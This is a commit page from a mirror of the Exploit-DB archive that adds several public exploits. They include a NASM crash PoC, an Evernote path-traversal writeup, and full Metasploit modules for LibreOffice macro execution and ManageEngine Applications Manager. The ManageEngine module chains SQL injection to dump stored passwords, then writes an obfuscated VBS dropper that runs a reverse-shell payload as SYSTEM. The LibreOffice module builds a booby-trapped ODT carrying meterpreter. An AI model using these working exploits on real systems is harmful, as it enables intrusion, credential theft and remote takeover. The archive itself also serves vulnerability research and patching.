bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-04-19

Browse source 
5 changes to exploits/shellcodes

Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)

Evernote 7.9 - Code Execution via Path Traversal

LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)

ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)
This commit is contained in:
Offensive Security 2019-04-19 05:02:10 +00:00
parent 5e1aca383e
commit ab955a9b5d
6 changed files with 412 additions and 11 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
exploits/macos/local/46724.txt Normal file
View file

@ -0,0 +1,28 @@
Exploit Title: Code execution via path traversal
# Date: 17-04-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://evernote.com/
# Software Link: https://evernote.com/download
# Version: 7.9
# Tested on: macOS Mojave v10.14.4
# CVE: CVE-2019-10038
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-10038
# https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
Summary:
A local file path traversal issue exists in Evernote 7.9 for macOS which
allows an attacker to execute arbitrary programs.
Technical observation:
A crafted URI can be used in a note to perform this attack using file:///
has an argument or by traversing to any directory like
(../../../../something.app).
Since, Evernote also has a feature of sharing notes, in such case attacker
could leverage this vulnerability and send crafted notes (.enex) to the
victim to perform any further attack.
Patch:
The patch for this issue is released in Evernote 7.10 Beta 1 for macOS
[MACOSNOTE-28840]. Also, the issue is tracked by CVE-2019-10038.

51
exploits/multiple/dos/46726.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
# Date: 2018-09-05
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://www.nasm.us/
# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
# Version: 2.14rc15 and earlier
# Tested on: 2.14rc15
# CVE : CVE-2018-16517
asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.
PoC:
1. echo "equ push rax" > poc
2. nasm -f elf poc
insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal().
[...]
if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) { <-- not taken
/* there's a label here */
first = false;
result->label = tokval.t_charptr;
i = stdscan(NULL, &tokval);
if (i == ':') { /* skip over the optional colon */
i = stdscan(NULL, &tokval);
} else if (i == 0) {
nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
"label alone on a line without a colon might be in error");
}
if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
/*
* FIXME: location.segment could be NO_SEG, in which case
* it is possible we should be passing 'absolute.segment'. Look into this.
* Work out whether that is *really* what we should be doing.
* Generally fix things. I think this is right as it is, but
* am still not certain.
*/
define_label(result->label,
in_absolute ? absolute.segment : location.segment,
location.offset, true);
[...]
static bool islocal(const char *l)
{
if (tasm_compatible_mode) {
if (l[0] == '@' && l[1] == '@')
return true;
}
return (l[0] == '.' && l[1] != '.'); <-- boom
}

115
exploits/multiple/local/46727.rb Executable file
View file

@ -0,0 +1,115 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Powershell
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'LibreOffice Macro Code Execution',
'Description' => %q{
LibreOffice comes bundled with sample macros written in Python and
allows the ability to bind program events to them. A macro can be tied
to a program event by including the script that contains the macro and
the function name to be executed. Additionally, a directory traversal
vulnerability exists in the component that references the Python script
to be executed. This allows a program event to execute functions from Python
scripts relative to the path of the samples macros folder. The pydoc.py script
included with LibreOffice contains the tempfilepager function that passes
arguments to os.system, allowing RCE.
This module generates an ODT file with a mouse over event that
when triggered, will execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alex Inführ', # Vulnerability discovery and PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2018-16858' ],
[ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
],
'Platform' => [ 'win', 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[
'Windows',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Payload' => 'windows/meterpreter/reverse_tcp',
'DefaultOptions' => { 'PrependMigrate' => true }
}
],
[
'Linux',
{
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Payload' => 'linux/x86/meterpreter/reverse_tcp',
'DefaultOptions' => { 'PrependFork' => true },
'CmdStagerFlavor' => 'printf',
}
]
],
'DisclosureDate' => "Oct 18, 2018",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
])
end
def gen_windows_cmd
opts =
{
:remove_comspec => true,
:method => 'reflection',
:encode_final_payload => true
}
@cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
@cmd << ' && echo'
end
def gen_linux_cmd
@cmd = generate_cmdstager.first
@cmd << ' && echo'
end
def gen_file(path)
text_content = Rex::Text.rand_text_alpha(10..15)
# file from Alex Inführ's PoC post referenced above
fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
libre_file = ERB.new(fodt_file).result(binding())
libre_file
rescue Errno::ENOENT
fail_with(Failure::NotFound, 'Cannot find template file')
end
def exploit
path = '../../../program/python-core-3.5.5/lib/pydoc.py'
if datastore['TARGET'] == 0
gen_windows_cmd
elsif datastore['TARGET'] == 1
gen_linux_cmd
else
fail_with(Failure::BadConfig, 'A formal target was not chosen.')
end
fodt_file = gen_file(path)
file_create(fodt_file)
end
end

213
exploits/windows/remote/46725.rb Executable file
View file

@ -0,0 +1,213 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => "ManageEngine Applications Manager 11.0 < 14.0 SQL Injection / Remote Code Execution",
'Description' => %q(
This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior versions.
An unauthenticated user can gain the authority of "system" on the server due to SQL injection vulnerability.
Exploit allows the writing of the desired file to the system using the postgesql structure.
Module is written over the payload by selecting a file with the extension ".vbs" that is used for monitoring
by the ManageEngine which working with "system" authority.
In addition, it dumps the users and passwords from the database for us.
Keep in mind! After the harmful ".vbs" file is written, the shell session may be a bit late.
Because the ManageEngine application should run this file itself.
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
],
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/ManageEngine-App-Manager-14-SQLi-Remote-Code-Execution.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 500,
'PAYLOAD' => 'windows/shell_reverse_tcp',
'RPORT' => 8443,
'SSL' => true
},
'Payload' =>
{
'Encoder' => 'x86/shikata_ga_nai'
},
'Platform' => ['win'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['AppManager 14', {}],
['AppManager 13', {}],
['AppManager 12', {}],
['AppManager 11', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Apr 17 2019',
'DefaultTarget' => 1))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
]
)
end
##
# Check exploit vulnerability basically // 'Appears' more convenient
##
def check
res = inject(Rex::Text.rand_text_alpha(1))
if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
##
# VBS payload and Post Data preparation
##
def get_payload
handler
payload = generate_payload_exe
@vbs_content = Msf::Util::EXE.to_exe_vbs(payload)
## determining the target directory
if target.name == 'AppManager 14'
tfile = "AppManager14"
elsif target.name == 'AppManager 13'
tfile = "AppManager13"
elsif target.name == 'AppManager 12'
tfile = "AppManager12"
elsif target.name == 'AppManager 11'
tfile = "AppManager11"
end
fhashes = Rex::Text.rand_text_alpha_lower(8) + ".txt"
## parameters required to read the user table
hashes = "sid=1;copy+(select+username,password+from+AM_UserPasswordTable)+to+$$"
hashes << "c:\\Program+Files+(x86)\\ManageEngine\\"
hashes << "#{tfile}"
hashes << "\\working\\"
hashes << "#{fhashes}"
hashes << "$$;--"
res = inject("#{hashes}")
if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
print_good("Users in the database were taken...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "#{fhashes}") # users file url
})
if res.code == "404"
fail_with(Failure::Unreachable, 'The database could not be read!')
else
print_status("--------------------Usernames and Passwords---------------------")
puts res.body # users table output
print_status("----------------------------------------------------------------")
end
else
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
## fetch base64 part in vbs payload
pb64 = @vbs_content.split('"
Dim')[0].split(' = "')[2]
## vbs file in one line
vbs_file = 'On Error Resume Next:Set objWbemLocator = CreateObject("WbemScripting.SWbemLocator"):'
vbs_file << 'if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description:End If:O'
vbs_file << 'n Error GoTo 0:On Error Resume Next:Select Case WScript.Arguments.Count:Case 2:strCo'
vbs_file << 'mputer = Wscript.Arguments(0):strQuery = Wscript.Arguments(1):Set wbemServices = obj'
vbs_file << 'WbemLocator.ConnectServer (strComputer,"Root\\CIMV2"):Case 4:strComputer = Wscript.A'
vbs_file << 'rguments(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):st'
vbs_file << 'rQuery = Wscript.Arguments(3):Set wbemServices = objWbemLocator.ConnectServer (strCo'
vbs_file << 'mputer,"Root\\CIMV2",strUsername,strPassword):case 6:strComputer = Wscript.Arguments'
vbs_file << '(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):strQuery ='
vbs_file << ' Wscript.Arguments(4):namespace = Wscript.Arguments(5):Set wbemServices = objWbemLoca'
vbs_file << 'tor.ConnectServer (strComputer,namespace,strUsername,strPassword):Case Else:strMsg ='
vbs_file << ' "Error # in parameters passed":WScript.Echo strMsg:WScript.Quit(0):End Select:Set w'
vbs_file << 'bemServices = objWbemLocator.ConnectServer (strComputer, namespace, strUsername, str'
vbs_file << 'Password):if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Descriptio'
vbs_file << 'n:End If:On Error GoTo 0:On Error Resume Next:Set colItems = wbemServices.ExecQuery(s'
vbs_file << 'trQuery):if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description'
vbs_file << ':End If:On Error GoTo 0:i=0:For Each objItem in colItems:if i=0 then:header = "":For '
vbs_file << 'Each param in objItem.Properties_:header = header & param.Name & vbTab:Next:WScript.E'
vbs_file << 'cho header:i=1:end if:serviceData = "":For Each param in objItem.Properties_:serviceD'
vbs_file << 'ata = serviceData & param.Value & vbTab:Next:WScript.Echo serviceData:Next:Function b'
vbs_file << 'PBdVfYpfCEHF(hBPVZMitxq):HHgwqsqii = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-m'
vbs_file << 'icrosoft-com:datatypes" & Chr(34) & " " & "dt:dt=" & Chr(34) & "bin.base64" & Chr(34)'
vbs_file << ' & ">" & hBPVZMitxq & "</B64DECODE>":Set TInPBSeVlL = CreateObject("MSXML2.DOMDocument'
vbs_file << '.3.0"):TInPBSeVlL.LoadXML(HHgwqsqii):bPBdVfYpfCEHF = TInPBSeVlL.selectsinglenode("B64D'
vbs_file << 'ECODE").nodeTypedValue:set TInPBSeVlL = nothing:End Function:Function txhYXYJJl():Emkf'
vbs_file << 'dMDdusgGha = "'
vbs_file << "#{pb64}"
vbs_file << '":Dim CCEUdwNSS:Set CCEUdwNSS = CreateObject("Scripting.FileSystemObject"):Dim zhgqIZn'
vbs_file << 'K:Dim gnnTqZvAcL:Set zhgqIZnK = CCEUdwNSS.GetSpecialFolder(2):gnnTqZvAcL = zhgqIZnK & '
vbs_file << '"\" & CCEUdwNSS.GetTempName():CCEUdwNSS.CreateFolder(gnnTqZvAcL):yZUoLXnPic = gnnTqZvAc'
vbs_file << 'L & "\" & "SAEeVSXQVkDEIG.exe":Dim mEciydMZTsoBmAo:Set mEciydMZTsoBmAo = CreateObject("'
vbs_file << 'Wscript.Shell"):LXbjZKnEQUfaS = bPBdVfYpfCEHF(EmkfdMDdusgGha):Set TUCiiidRgJQdxTl = Cre'
vbs_file << 'ateObject("ADODB.Stream"):TUCiiidRgJQdxTl.Type = 1:TUCiiidRgJQdxTl.Open:TUCiiidRgJQdxT'
vbs_file << 'l.Write LXbjZKnEQUfaS:TUCiiidRgJQdxTl.SaveToFile yZUoLXnPic, 2:mEciydMZTsoBmAo.run yZU'
vbs_file << 'oLXnPic, 0, true:CCEUdwNSS.DeleteFile(yZUoLXnPic):CCEUdwNSS.DeleteFolder(gnnTqZvAcL):E'
vbs_file << 'nd Function:txhYXYJJl:WScript.Quit(0)'
## encode the vbs file to base64 and then encode the url-hex
encoding_vbs = Rex::Text.uri_encode(Rex::Text.encode_base64(vbs_file), 'hex-all')
## post preparation // creating and writing files on the server with SQLi
vbs_payload = "sid=1;copy+(select+convert_from(decode($$#{encoding_vbs}$$,$$base64$$)"
vbs_payload << ",$$utf-8$$))+to+$$C:\\\\Program+Files+(x86)\\\\ManageEngine\\\\"
vbs_payload << "#{tfile}"
vbs_payload << "\\\\working\\\\conf\\\\application\\\\scripts\\\\wmiget.vbs$$;"
res = inject("#{vbs_payload}")
if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
print_good("The harmful .vbs file was successfully written to the server.")
print_status("Keep in mind! You may have to wait between 10-300 seconds for the shell session.")
else
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
return payload
end
##
# Call functions
##
def exploit
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
print_status("Payload is preparing...")
get_payload
end
##
# Inj payload
##
def inject(payload)
res = send_request_cgi(
{
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, '/jsp/Popup_SLA.jsp'),
'data' => payload
}, 25)
end
end
##
# The end of the adventure (o_O) // AkkuS
##

4
files_exploits.csv
View file

@ -6391,6 +6391,7 @@ id,file,description,date,author,type,platform,port
46721,exploits/windows/dos/46721.py,"DHCP Server 2.5.2 - Denial of Service (PoC)",2019-04-17,"Victor Mondragón",dos,windows,
46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
46726,exploits/multiple/dos/46726.txt,"Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)",2019-04-18,"Fakhri Zulkifli",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10417,6 +10418,7 @@ id,file,description,date,author,type,platform,port
46688,exploits/windows/local/46688.txt,"CyberArk EPM 10.2.1.603 - Security Restrictions Bypass",2019-04-12,"Alpcan Onaran",local,windows,
46690,exploits/windows/local/46690.txt,"Microsoft Internet Explorer 11 - XML External Entity Injection",2019-04-12,hyp3rlinx,local,windows,
46692,exploits/windows/local/46692.rb,"Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)",2019-04-12,Metasploit,local,windows,
46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,
46707,exploits/windows/local/46707.txt,"Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) - Privilege Escalation",2019-04-16,"Digital Interruption",local,windows,
46712,exploits/windows/local/46712.txt,"Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
46713,exploits/windows/local/46713.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
@ -10425,6 +10427,7 @@ id,file,description,date,author,type,platform,port
46716,exploits/windows/local/46716.txt,"Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass",2019-04-16,"Google Security Research",local,windows,
46717,exploits/windows/local/46717.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17340,6 +17343,7 @@ id,file,description,date,author,type,platform,port
46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Can't render this file because it is too large.

12
shellcodes/generator/46696.py
View file

@ -96,14 +96,4 @@ main()
printf("Shellcode Length: %d\n", strlen(code));
int (*CodeFun)() = (int(*)())code;
CodeFun();
}
################################################################################
Kind Regards
------------------------------
Bc. Petr Javorik
www.mmquant.net
<http://www.mmquant.net/>maple@mmquant.net
}